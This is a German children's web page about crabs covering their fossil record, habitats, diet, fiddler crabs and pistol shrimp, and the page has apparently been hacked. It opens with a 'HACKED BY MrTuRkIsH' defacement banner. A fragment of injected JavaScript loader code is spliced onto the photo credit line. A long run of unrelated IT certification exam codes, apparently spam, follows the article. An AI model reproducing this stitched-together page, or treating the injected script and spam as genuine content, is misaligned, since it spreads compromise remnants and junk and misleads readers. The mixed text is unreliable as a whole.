HACKED BY
MrTuRkIsH



MrTuRkIsH

Krebse « Florians Galaxis – Kinderseite und Kinderspiele
Krebs

Krebse

Seit wann gibt es Krebse?

Diese Frage kann bis heute noch kein Wissenschaftler ganz genau beantworten. Man weiß, dass es schon vor über 500 Millionen Jahren Krebse gegeben haben muss, entsprechende Funde von Fossilien lassen darauf schließen. Allerdings lässt sich der Zeitpunkt nicht genau eingrenzen, denn es gibt da ein Problem.

Fossilien, das weißt du sicherlich schon, sind versteinerte Zeichen vergangener Lebensformen. So kann man zum Beispiel versteinerte Knochen oder Zähne von Sauriern finden, die sich zusammensetzen lassen, wodurch man eine Vorstellung bekommen kann, wie sie einmal ausgesehen haben. Dies ist jedoch bei vielen Krebsarten leider nicht möglich, da ihr Panzer aus einem Material besteht, das Chitin genannt wird. Chitin unterscheidet sich von dem Material, aus dem die Knochen der Saurier bestehen. Es zerfällt in seine Bestandteile, bevor der Prozess der Versteinerung einsetzen kann. Das ist der Grund dafür, dass man nur selten ein Krebs-Fossil findet, an dem man das Alter oder auch das ursprüngliche Aussehen des Krebses ablesen könnte. Aber es steht fest, dass es schon sehr, sehr, sehr lange Krebse auf der Erde gibt.

Wo leben Krebse?

Der Lebensraum eines Krebses ist abhängig von seiner Art. Es gibt über 40.000 verschiedene Krebsarten. Sie können im Salzwasser leben, sie können aber auch im Süßwasser leben. Sie leben in Riffen, am Grund eines Sees, an der Unterseite von Schiffen, an Fischen, in Algen oder auch im freien Wasser. Und dies sind nur einige wenige Lebensräume für Krebse, es gibt erheblich mehr Orte oder Plätze im Wasser, die als Lebensraum für einen Krebs geeignet sind. Es gibt sogar einige Krebs, die an Land leben können, wie etwa Einsiedlerkrebse oder auch Strandkrabben. Beide Krebsarten sind jedoch, obwohl sie an Land leben können, an das Wasser gebunden. Sie legen zwar an Land ihre Eier, wo auch ihr Nachwuchs schlüpft, dieser wächst jedoch im Wasser heran und verlässt es erst, wenn er groß genug ist. Das besondere ist, dass Krebse immer zu dem Gewässer zurückkehren, in dem sie selber groß geworden sind. Vielleicht hast du schon einmal von Krebswanderungen gehört, bei denen tausende von Krabben sich auf den Weg zu ihrem Heimatgewässer machen, damit auch ihr Nachwuchs dort aufwachsen kann.

Was fressen Krebse?

Das Nahrungsspektrum von Krebsen ist sehr groß und natürlich ist es auch abhängig von ihrer Größe. Sicher kannst du dir vorstellen, dass ein Grundwasserflohkrebs, der nur wenige Millimeter groß ist, etwas anderes frisst, als etwa eine Seespinne, deren Beine eine Spannweitevon bis zu drei Metern haben können. Kleine Krebse und Krabben ernähren sich zum Beispiel von Plankton, das sind die kleinsten im Wasser lebenden Organismen. Größere Exemplare, wie etwa die Dreieckskrabben, sind Allesfresser. Man nennt sie auch die Ordnungshüter der Meere, da sie für die Sauberkeit sorgen, indem sie etwa abgestorbene Pflanzen fressen. Aber auch kleinere Artgenossen stehen regelmäßig auf dem Speiseplan, wenn die größeren Exemplare es schaffen, den Panzer der kleineren zu öffnen.

Gibt es besondere Krebse?

Winkerkrabben

Natürlich gibt es die! Vielleicht kennst du ja schon eine der besonders bekannten Arten: die Winkerkrabben. Winkerkrabben zeichnen sich dadurch aus, dass die Männchen eine normal große und eine nahezu riesige Scherer haben. Diese Schere hat eine ganz besondere Aufgabe. Sie dient nicht etwa dazu, Beutetiere zu erjagen. Diese Schere spielt im dem Paarungsverhalten der Winkerkrabben eine große Rolle. Die Männchen heben und senken diese Schere in regelmäßigen Abständen, es sieht aus, als würden sie winken, um ein Weibchen zu werben. Diesem Verhalten verdanken die Winkerkrabben ihren Namen.

Winkerkrabben kennst du vielleicht schon, aber kennst du auch Knallkrebse? Knallkrebse werden auch Pistolenkrebse genannt und das nicht ohne Grund! Mit ihren Scheren können sie ein unglaublich lautes Geräusch erzeugen. Dieses Geräusch kann Angreifer vertreiben, Beutetiere betäuben oder Glasgefäße, in denen Pistolenkrabben gefangen sind, zum Bersten bringen. Bei Knallkrebsen ist der Name Programm!

Fotos: ©iStockphoto.com/KevinDyer, anthonyjhalldocument.currentScript.parentNode.insertBefore(s, document.currentScript);


Dez 23, 2012 | Kategorie: Kinderspiele | Kommentare: Keine | Tags: , ,

Dies und Das:



SSCP   CAS-002   9L0-066   350-050   642-999   220-801   74-678   642-732   400-051   ICGB   c2010-652   70-413   101-400   220-902   350-080   210-260   70-246   1Z0-144   3002   AWS-SYSOPS   70-347   PEGACPBA71V1   220-901   70-534   LX0-104   070-461   HP0-S42   1Z0-061   000-105   70-486   70-177   N10-006   500-260   640-692   70-980   CISM   VCP550   70-532   200-101   000-080   PR000041   2V0-621   70-411   352-001   70-480   70-461   ICBB   000-089   70-410   350-029   1Z0-060   2V0-620   210-065   70-463   70-483   CRISC   MB6-703   1z0-808   220-802   ITILFND   1Z0-804   LX0-103   MB2-704   210-060   101   200-310   640-911   200-120   EX300   300-209   1Z0-803   350-001   400-201   9L0-012   70-488   JN0-102   640-916   70-270   100-101   MB5-705   JK0-022   350-060   300-320   1z0-434   350-018   400-101   350-030   000-106   ADM-201   300-135   300-208   EX200   PMP   NSE4   1Z0-051   c2010-657   C_TFIN52_66   300-115   70-417   9A0-385   70-243   300-075   70-487   NS0-157   MB2-707   70-533   CAP   OG0-093   M70-101   300-070   102-400   JN0-360   SY0-401   000-017   300-206   CCA-500   70-412   2V0-621D   70-178   810-403   70-462   OG0-091   1V0-601   200-355   000-104   700-501   70-346   CISSP   300-101   1Y0-201   200-125  , 200-125  , 100-105  , 100-105  , 70-347   2V0-621   300-101   220-802   210-260   JN0-360   NS0-157   70-487   70-532   1Z0-060   300-070   210-060   70-532   1Z0-060  , 220-802  , 1Y0-201   1Z0-061   352-001   NSE4  , 1Z0-803  , 640-692   MB2-707   102-400   352-001   OG0-093  , 70-270  , 70-980   MB5-705   N10-006   101-400   70-270   CAP   CAP   220-802   000-105   70-486   300-070   70-270  , 1Y0-201   500-260  , 2V0-620   400-101   101  , AWS-SYSOPS  , c2010-657   N10-006   300-208   642-732   SY0-401   100-105  , 1Z0-061   642-732   000-104  , 9L0-066  , 70-462   300-115  



bottom